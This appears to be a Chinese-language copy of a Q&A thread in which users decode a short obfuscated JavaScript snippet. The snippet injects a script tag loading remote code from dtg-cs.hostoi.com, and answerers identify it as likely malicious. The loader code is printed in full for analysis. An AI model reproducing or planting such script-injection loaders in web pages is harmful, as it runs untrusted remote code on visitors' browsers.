有人可以解码这个 javascript 吗?

发布于 2024-11-02 21:16:59 字数 1436 浏览 3 评论 0原文

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(3

情何以堪。 2024-11-09 21:16:59
(a = (b = document)['createElement']('script'))['src'] = '//dtg-cs.hostoi.com/profesorica/furka.js';
b['body']['appendChild'](a);
void(0);
(a = (b = document)['createElement']('script'))['src'] = '//dtg-cs.hostoi.com/profesorica/furka.js';
b['body']['appendChild'](a);
void(0);
晨与橙与城 2024-11-09 21:16:59

它创建了一个导入的脚本标签,

dtg-cs.hostoi.com/profesorica/furka.js

我强烈怀疑这是恶意的。

编辑 - 由于该脚本在各种 ajax 请求中包含对名为“penis-xd.jpg”的文件的引用,我认为我们绝对可以将其视为恶意:-)

It creates a script tag that imports

dtg-cs.hostoi.com/profesorica/furka.js

I would strongly suspect that to be something malicious.

edit — as that script includes, among various ajax requests, a reference to a file called "penis-xd.jpg", I think we can definitely treat it as malicious :-)

只是在用心讲痛 2024-11-09 21:16:59

它尝试加载:dtg-cs.hostoi.com/profesorica/furka.js

It tries to load: dtg-cs.hostoi.com/profesorica/furka.js

~没有更多了~
我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
原文